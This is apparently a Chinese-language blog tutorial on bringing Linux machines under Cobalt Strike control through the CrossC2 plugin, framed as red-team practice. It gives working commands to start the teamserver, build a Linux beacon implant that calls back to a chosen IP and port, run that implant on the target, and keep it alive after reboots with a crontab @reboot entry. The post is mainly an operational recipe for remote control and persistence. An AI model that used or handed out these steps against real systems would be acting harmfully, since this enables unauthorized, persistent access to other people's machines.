為獲得最佳的閱讀體驗,請訪問我的個人主頁: https://xzajyjs.cn/
在紅藍對抗中,我們常需要對目標進行長時間的控制,cobaltstrike原生對於上線windows比較輕松友好,但如果是Linux平台就需要用到第三方插件了。
准備工作
這里使用CrossC2的插件,類似於在linux上反彈一個cobaltstrike類的shell。
github:https://github.com/gloxec/CrossC2
下載時注意自己的cs版本(我這里使用的是3.0.2的最新版插件,cs版本為4.3)
需要下載以下兩個文件:
CrossC2***.cna、genCrossC2.Linux
由於我的木馬是在linux平台生成的,因此使用genCrossC2.Linux,可根據自己平台的差異自行選擇
服務端部署
cobaltstrike服務端部署
chmod +x teamserver
./teamserver [ip] [password]
客戶端連接
建立一個監聽器,需要注意的是crossc2插件只支持https的beacon
安裝crossc2
生成木馬
我這里是在服務端的cobaltstrike目錄直接生成的,如果在非服務端生成需要將服務端根目錄的隱藏文件
.cobaltstrike.beacon_keys復制下來放到cs根目錄
chmod +x genCrossC2.Linux
./genCrossC2.Linux [ip] [port] ./.cobaltstrike.beacon_keys null Linux x64 /tmp/test
上線
在目標靶機上直接運行就可以看到上線了.
chmod +x test
./test
權限維持
一個簡單的思想就是將其添加的系統啟動項
有很多種方法,這里講個最簡單的,通過計划任務的方式實現
crontab -e
@reboot /tmp/test
這樣每次重啟之后都能重新執行
這里需要注意的是要設置以下次登錄的用戶的crontab